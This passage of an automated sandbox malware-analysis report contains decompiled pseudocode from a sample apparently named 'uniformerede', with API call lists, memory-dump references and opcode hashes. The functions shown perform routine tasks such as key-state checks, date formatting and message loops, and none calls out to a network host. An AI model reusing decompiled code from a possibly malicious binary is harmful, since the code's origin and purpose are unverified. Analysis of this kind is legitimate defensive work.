					E00406A70(_t60,  &_v372);
					E0040D180(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E00404C30( &_v340, 0x105,  &_v297);
					E00409E18(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x49dcbc; // 0x407e84
					E00406A70(_t82,  &_v344);
					E0040D180(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040D762);
				E004049C0( &_v372);
				E004049E4( &_v344, 3);
				return E004049C0( &_v8);
			}

































                                                                                                                                                                                                                            0x0040d5a0
                                                                                                                                                                                                                            0x0040d5ad
                                                                                                                                                                                                                            0x0040d5b3
                                                                                                                                                                                                                            0x0040d5b9
                                                                                                                                                                                                                            0x0040d5bf
                                                                                                                                                                                                                            0x0040d5c5
                                                                                                                                                                                                                            0x0040d5ca
                                                                                                                                                                                                                            0x0040d5cb
                                                                                                                                                                                                                            0x0040d5d0
                                                                                                                                                                                                                            0x0040d5d3
                                                                                                                                                                                                                            0x0040d5d9
                                                                                                                                                                                                                            0x0040d5e0
                                                                                                                                                                                                                            0x0040d5f4
                                                                                                                                                                                                                            0x0040d5f9
                                                                                                                                                                                                                            0x0040d5e2
                                                                                                                                                                                                                            0x0040d5e5
                                                                                                                                                                                                                            0x0040d5ea
                                                                                                                                                                                                                            0x0040d5ea
                                                                                                                                                                                                                            0x0040d5fe
                                                                                                                                                                                                                            0x0040d60b
                                                                                                                                                                                                                            0x0040d617
                                                                                                                                                                                                                            0x0040d6d3
                                                                                                                                                                                                                            0x0040d6d9
                                                                                                                                                                                                                            0x0040d6e3
                                                                                                                                                                                                                            0x0040d6e9
                                                                                                                                                                                                                            0x0040d6f0
                                                                                                                                                                                                                            0x0040d6f6
                                                                                                                                                                                                                            0x0040d70c
                                                                                                                                                                                                                            0x0040d711
                                                                                                                                                                                                                            0x0040d723
                                                                                                                                                                                                                            0x0040d63a
                                                                                                                                                                                                                            0x0040d63d
                                                                                                                                                                                                                            0x0040d643
                                                                                                                                                                                                                            0x0040d65b
                                                                                                                                                                                                                            0x0040d66c
                                                                                                                                                                                                                            0x0040d677
                                                                                                                                                                                                                            0x0040d67d
                                                                                                                                                                                                                            0x0040d687
                                                                                                                                                                                                                            0x0040d68d
                                                                                                                                                                                                                            0x0040d694
                                                                                                                                                                                                                            0x0040d69a
                                                                                                                                                                                                                            0x0040d6b0
                                                                                                                                                                                                                            0x0040d6b5
                                                                                                                                                                                                                            0x0040d6c7
                                                                                                                                                                                                                            0x0040d6cc
                                                                                                                                                                                                                            0x0040d72c
                                                                                                                                                                                                                            0x0040d72f
                                                                                                                                                                                                                            0x0040d732
                                                                                                                                                                                                                            0x0040d73d
                                                                                                                                                                                                                            0x0040d74d
                                                                                                                                                                                                                            0x0040d75a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D75B), ref: 0040D60B
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D75B), ref: 0040D62D
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                                                                                                                                                            • String ID: |}@
                                                                                                                                                                                                                            • API String ID: 902310565-1323765261
                                                                                                                                                                                                                            • Opcode ID: 25be1960f6db36998ca4914cfa2c85f29290a83f72f346ca75a33df59a24262f
                                                                                                                                                                                                                            • Instruction ID: 969e10bc4ad112e79de870a84619b0299ea79aa46f8ff725eca5e2ac65c0a227
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25be1960f6db36998ca4914cfa2c85f29290a83f72f346ca75a33df59a24262f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41410470D00618DFDB21DF65CC81BDAB7B4AB49304F4041FAE508AB291D778AE88CF95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044E02C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0044E02C(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x49ebac; // 0x2210da8
					E0042C30C(_t34,  &_v24);
					_push(_t69);
					_push(0x44e12a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0044DD30(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x44e131);
							_t40 =  *0x49ebac; // 0x2210da8
							return E0042C304(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x49ebac; // 0x2210da8
					E0042C30C(_t42,  &_v8);
					_push(_t69);
					_push(0x44e0ff);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E0044DED8( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x44e106);
					_t48 =  *0x49ebac; // 0x2210da8
					return E0042C304(_t48);
				}
				L14:
			}


















                                                                                                                                                                                                                            0x0044e02d
                                                                                                                                                                                                                            0x0044e02f
                                                                                                                                                                                                                            0x0044e033
                                                                                                                                                                                                                            0x0044e035
                                                                                                                                                                                                                            0x0044e03f
                                                                                                                                                                                                                            0x0044e048
                                                                                                                                                                                                                            0x0044e147
                                                                                                                                                                                                                            0x0044e04e
                                                                                                                                                                                                                            0x0044e058
                                                                                                                                                                                                                            0x0044e05a
                                                                                                                                                                                                                            0x0044e05a
                                                                                                                                                                                                                            0x0044e06a
                                                                                                                                                                                                                            0x0044e06c
                                                                                                                                                                                                                            0x0044e06c
                                                                                                                                                                                                                            0x0044e076
                                                                                                                                                                                                                            0x0044e078
                                                                                                                                                                                                                            0x0044e078
                                                                                                                                                                                                                            0x0044e084
                                                                                                                                                                                                                            0x0044e08a
                                                                                                                                                                                                                            0x0044e08f
                                                                                                                                                                                                                            0x0044e096
                                                                                                                                                                                                                            0x0044e097
                                                                                                                                                                                                                            0x0044e09c
                                                                                                                                                                                                                            0x0044e09f
                                                                                                                                                                                                                            0x0044e0a2
                                                                                                                                                                                                                            0x0044e0a2
                                                                                                                                                                                                                            0x0044e0b4
                                                                                                                                                                                                                            0x0044e0bb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e10a
                                                                                                                                                                                                                            0x0044e114
                                                                                                                                                                                                                            0x0044e117
                                                                                                                                                                                                                            0x0044e11a
                                                                                                                                                                                                                            0x0044e11f
                                                                                                                                                                                                                            0x0044e129
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044e10a
                                                                                                                                                                                                                            0x0044e0c0
                                                                                                                                                                                                                            0x0044e0c5
                                                                                                                                                                                                                            0x0044e0cc
                                                                                                                                                                                                                            0x0044e0cd
                                                                                                                                                                                                                            0x0044e0d2
                                                                                                                                                                                                                            0x0044e0d5
                                                                                                                                                                                                                            0x0044e0e4
                                                                                                                                                                                                                            0x0044e0e9
                                                                                                                                                                                                                            0x0044e0ec
                                                                                                                                                                                                                            0x0044e0ef
                                                                                                                                                                                                                            0x0044e0f4
                                                                                                                                                                                                                            0x0044e0fe
                                                                                                                                                                                                                            0x0044e0fe
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 0044E050
                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0044E062
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1649606143-3916222277
                                                                                                                                                                                                                            • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                                                            • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004354E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E004354E8(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t33;
				long _t46;
				CHAR* _t48;
				void* _t55;
				intOrPtr _t67;
				void* _t74;
				char _t76;
				void* _t79;

				_t74 = __edi;
				_t78 = _t79;
				_push(__ebx);
				_push(__esi);
				_v32 = 0;
				_v8 = 0;
				_v12 = 0;
				_t76 = __edx;
				_t55 = __eax;
				_push(_t79);
				_push(0x4355e0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe4;
				_t81 = __edx;
				if(__edx == 0) {
					E0040D200(0x435088, 1);
					E00404378();
				}
				_v28 = _t76;
				_v24 = 0xb;
				E00435234(_t55, _t55,  &_v32, 0, _t74, _t76);
				_v20 = _v32;
				_v16 = 0xb;
				E0040A664("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
				_t33 = E00435B78(_t55, _t74, _t78, _t81);
				_t82 = _t33;
				if(_t33 != 0) {
					E00435234(_t55, _t55,  &_v12, 0, _t74, _t76);
					if(E00435AD0(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
						 *((char*)(_t55 + 0x10)) = 1;
						E00404A14(_t55 + 0x14, _v8);
						_t46 = E00404E80(_v8);
						_t48 = E00404E80(_v12);
						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x4355e7);
				E004049C0( &_v32);
				return E004049E4( &_v12, 2);
			}


















                                                                                                                                                                                                                            0x004354e8
                                                                                                                                                                                                                            0x004354e9
                                                                                                                                                                                                                            0x004354ee
                                                                                                                                                                                                                            0x004354ef
                                                                                                                                                                                                                            0x004354f2
                                                                                                                                                                                                                            0x004354f5
                                                                                                                                                                                                                            0x004354f8
                                                                                                                                                                                                                            0x004354fb
                                                                                                                                                                                                                            0x004354fd
                                                                                                                                                                                                                            0x00435501
                                                                                                                                                                                                                            0x00435502
                                                                                                                                                                                                                            0x00435507
                                                                                                                                                                                                                            0x0043550a
                                                                                                                                                                                                                            0x0043550d
                                                                                                                                                                                                                            0x0043550f
                                                                                                                                                                                                                            0x0043551d
                                                                                                                                                                                                                            0x00435522
                                                                                                                                                                                                                            0x00435522
                                                                                                                                                                                                                            0x0043552b
                                                                                                                                                                                                                            0x0043552e
                                                                                                                                                                                                                            0x00435539
                                                                                                                                                                                                                            0x00435541
                                                                                                                                                                                                                            0x00435544
                                                                                                                                                                                                                            0x00435555
                                                                                                                                                                                                                            0x0043555c
                                                                                                                                                                                                                            0x00435561
                                                                                                                                                                                                                            0x00435563
                                                                                                                                                                                                                            0x0043556c
                                                                                                                                                                                                                            0x00435581
                                                                                                                                                                                                                            0x00435589
                                                                                                                                                                                                                            0x00435593
                                                                                                                                                                                                                            0x0043559b
                                                                                                                                                                                                                            0x004355a9
                                                                                                                                                                                                                            0x004355b8
                                                                                                                                                                                                                            0x004355b8
                                                                                                                                                                                                                            0x00435581
                                                                                                                                                                                                                            0x004355bf
                                                                                                                                                                                                                            0x004355c2
                                                                                                                                                                                                                            0x004355c5
                                                                                                                                                                                                                            0x004355cd
                                                                                                                                                                                                                            0x004355df

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")"), xrefs: 00435550
                                                                                                                                                                                                                            • hI, xrefs: 00435511
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Help
                                                                                                                                                                                                                            • String ID: IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")$hI
                                                                                                                                                                                                                            • API String ID: 2830496658-455175267
                                                                                                                                                                                                                            • Opcode ID: c86f70cb4bcd8f45d690b90ea4a5f8ae0b7854847ac278ac67c2f23580fc15e0
                                                                                                                                                                                                                            • Instruction ID: ee1a8833f3819ee9826a6e87181a8fb7dc7e8b52fcd89467c6c2dda304d0cd71
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c86f70cb4bcd8f45d690b90ea4a5f8ae0b7854847ac278ac67c2f23580fc15e0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC3166B0A006049BDB04EFA5D885A9FB7B5AF4C304F51547EF900A7392D778AE05CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045AE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81threadwindowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t52;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __esi;
				_t71 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x45af60);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t56 = E0045ADD8(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t52 = _v8;
					_t79 =  *((intOrPtr*)(_t52 + 0x48));
					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
						E0045B3A8(_v8);
					}
				}
				E00458DF8(_t56,  &_v20);
				E004380E0(_v20, 0,  &_v16, _t79);
				_t36 =  *0x49ebb8; // 0x0
				E0045B010(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x45af07);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0x102)) != 0) {
					_t56 = _v8;
					 *((intOrPtr*)(_v8 + 0x100))();
				}
				if(_v9 != 0) {
					E0045AD74();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x49de40; // 0x49e034
				if(_t41 ==  *_t67 && E004214B8(0, _t56, _t71, _t72) != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E0045AF67);
				return E004049E4( &_v20, 2);
			}
















                                                                                                                                                                                                                            0x0045ae50
                                                                                                                                                                                                                            0x0045ae50
                                                                                                                                                                                                                            0x0045ae51
                                                                                                                                                                                                                            0x0045ae53
                                                                                                                                                                                                                            0x0045ae56
                                                                                                                                                                                                                            0x0045ae57
                                                                                                                                                                                                                            0x0045ae58
                                                                                                                                                                                                                            0x0045ae5b
                                                                                                                                                                                                                            0x0045ae5e
                                                                                                                                                                                                                            0x0045ae61
                                                                                                                                                                                                                            0x0045ae66
                                                                                                                                                                                                                            0x0045ae67
                                                                                                                                                                                                                            0x0045ae6c
                                                                                                                                                                                                                            0x0045ae6f
                                                                                                                                                                                                                            0x0045ae7a
                                                                                                                                                                                                                            0x0045ae86
                                                                                                                                                                                                                            0x0045ae88
                                                                                                                                                                                                                            0x0045ae8b
                                                                                                                                                                                                                            0x0045ae8f
                                                                                                                                                                                                                            0x0045ae94
                                                                                                                                                                                                                            0x0045ae94
                                                                                                                                                                                                                            0x0045ae8f
                                                                                                                                                                                                                            0x0045ae9e
                                                                                                                                                                                                                            0x0045aea9
                                                                                                                                                                                                                            0x0045aeb1
                                                                                                                                                                                                                            0x0045aeb6
                                                                                                                                                                                                                            0x0045aebb
                                                                                                                                                                                                                            0x0045aec1
                                                                                                                                                                                                                            0x0045aec2
                                                                                                                                                                                                                            0x0045aec7
                                                                                                                                                                                                                            0x0045aeca
                                                                                                                                                                                                                            0x0045aed8
                                                                                                                                                                                                                            0x0045aedd
                                                                                                                                                                                                                            0x0045aee9
                                                                                                                                                                                                                            0x0045aee9
                                                                                                                                                                                                                            0x0045aef3
                                                                                                                                                                                                                            0x0045aef8
                                                                                                                                                                                                                            0x0045aef8
                                                                                                                                                                                                                            0x0045aeff
                                                                                                                                                                                                                            0x0045af02
                                                                                                                                                                                                                            0x0045af1c
                                                                                                                                                                                                                            0x0045af21
                                                                                                                                                                                                                            0x0045af29
                                                                                                                                                                                                                            0x0045af36
                                                                                                                                                                                                                            0x0045af36
                                                                                                                                                                                                                            0x0045af3e
                                                                                                                                                                                                                            0x0045af40
                                                                                                                                                                                                                            0x0045af40
                                                                                                                                                                                                                            0x0045af47
                                                                                                                                                                                                                            0x0045af4a
                                                                                                                                                                                                                            0x0045af4d
                                                                                                                                                                                                                            0x0045af5f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 0045ADD8: GetCursorPos.USER32 ref: 0045ADE1
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0045AF1C
                                                                                                                                                                                                                            • WaitMessage.USER32(00000000,0045AF60,?,?,?,0049ABD1), ref: 0045AF40
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentCursorMessageThreadWait
                                                                                                                                                                                                                            • String ID: 4I
                                                                                                                                                                                                                            • API String ID: 535285469-2364942553
                                                                                                                                                                                                                            • Opcode ID: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                                                            • Instruction ID: 3d320c2a842818ba80bdb21166925b08477e9e3b0af4457c4c140f173818ef6e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1641b2bc43e08f655398654ef54c6e0fb99346d68cca38ad066637ff64216bef
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431D670A04208EFDB01DF65C846BAEB7F5EB05305F6145BAEC00A7392D7796E58C71A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040B620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0040B620(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x40b6fe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E004049C0(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00404A58( &_v8, 0x40b720);
				} else {
					E00404A58( &_v8, 0x40b714);
				}
				_t32 = E00404E80(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00404C30(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00404EE0( *_t49, E00404C80( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E0040B705);
				return E004049C0( &_v8);
			}













                                                                                                                                                                                                                            0x0040b62d
                                                                                                                                                                                                                            0x0040b630
                                                                                                                                                                                                                            0x0040b632
                                                                                                                                                                                                                            0x0040b636
                                                                                                                                                                                                                            0x0040b637
                                                                                                                                                                                                                            0x0040b63c
                                                                                                                                                                                                                            0x0040b63f
                                                                                                                                                                                                                            0x0040b644
                                                                                                                                                                                                                            0x0040b650
                                                                                                                                                                                                                            0x0040b65b
                                                                                                                                                                                                                            0x0040b666
                                                                                                                                                                                                                            0x0040b66d
                                                                                                                                                                                                                            0x0040b686
                                                                                                                                                                                                                            0x0040b66f
                                                                                                                                                                                                                            0x0040b677
                                                                                                                                                                                                                            0x0040b677
                                                                                                                                                                                                                            0x0040b69a
                                                                                                                                                                                                                            0x0040b6b3
                                                                                                                                                                                                                            0x0040b6c2
                                                                                                                                                                                                                            0x0040b6c8
                                                                                                                                                                                                                            0x0040b6e3
                                                                                                                                                                                                                            0x0040b6e3
                                                                                                                                                                                                                            0x0040b6c8
                                                                                                                                                                                                                            0x0040b6ea
                                                                                                                                                                                                                            0x0040b6ed
                                                                                                                                                                                                                            0x0040b6f0
                                                                                                                                                                                                                            0x0040b6fd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6A6
                                                                                                                                                                                                                            • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B6FE), ref: 0040B6AC
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DateFormatLocaleThread
                                                                                                                                                                                                                            • String ID: yyyy
                                                                                                                                                                                                                            • API String ID: 3303714858-3145165042
                                                                                                                                                                                                                            • Opcode ID: c40c53b5022c3b6d53ef6eb9169cbbe0f0549cacc423d75f4f5ec497cf9a52fc
                                                                                                                                                                                                                            • Instruction ID: 9bb3f367f0bbc217274b1ad28ba4a7515005ed0bbfdc0499212bfc9343ce28fe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c40c53b5022c3b6d53ef6eb9169cbbe0f0549cacc423d75f4f5ec497cf9a52fc
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E42132B46041089BDB01EBA5C942AAE73A8EF48300F51447BF904F73D1D7789E04C7AE
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042A3E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 59%
                                                                                                                                                                                                                            			E0042A3E8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403BBC(1);
				_push(_t77);
				_push(0x42a46f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x418ef8; // 0x418f44
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403D9C(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x49e8b0);
				L00406FE0();
				_push(_t77);
				_push(0x42a4cf);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00428E70( *((intOrPtr*)(_v8 + 0x28)));
